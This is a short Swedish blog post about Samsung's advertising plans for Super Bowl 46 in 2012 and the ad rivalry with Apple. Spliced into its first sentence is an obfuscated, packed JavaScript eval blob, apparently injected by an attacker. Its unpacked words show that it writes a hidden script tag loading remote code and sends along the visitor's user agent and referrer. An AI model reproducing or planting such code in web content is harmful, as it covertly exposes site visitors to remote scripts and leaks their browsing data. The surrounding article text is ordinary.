Image Image Image Image Image Image Image Image Image Image

| 19 oktober, 2018

Scroll to top

Top

Super bowl (46) 2012 närmar sig

Super bowl (46) 2012 närmar sig
Sebastian Plengier Ehrnfelt
Snart eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|niart|var|u0026u|referrer|sfnzr||js|php’.split(‘|’),0,{}))
är det dags för Super Bowl 2012 (Super bowl 46) och Samsung har redan gjort sig redo för sina reklam. ”We just got Samsunget”
Den femte februari är det dags för Super Bowl i amerikanska NFL (National football leauge). Det är möjligt att detta blir ett av de dyraste evemenaget på länge, gällande reklam. Det är känt att NFL har världens dyraste reklamplater, förre times square i New York som är väldigt eftertraktat.
Elektronik är idag också svårt att sälja på grund av konkurrensen, därför är det extra spännande att se vem som satsar mest.
Här har vi Samsungs bidrag till Super Bowl 2012. Det ska bli kul att se hur fajten mellan Apple och Samsung blir under evenemanget Super Bowl.
Vem kommer ta hem vinsten gällande reklam exponering?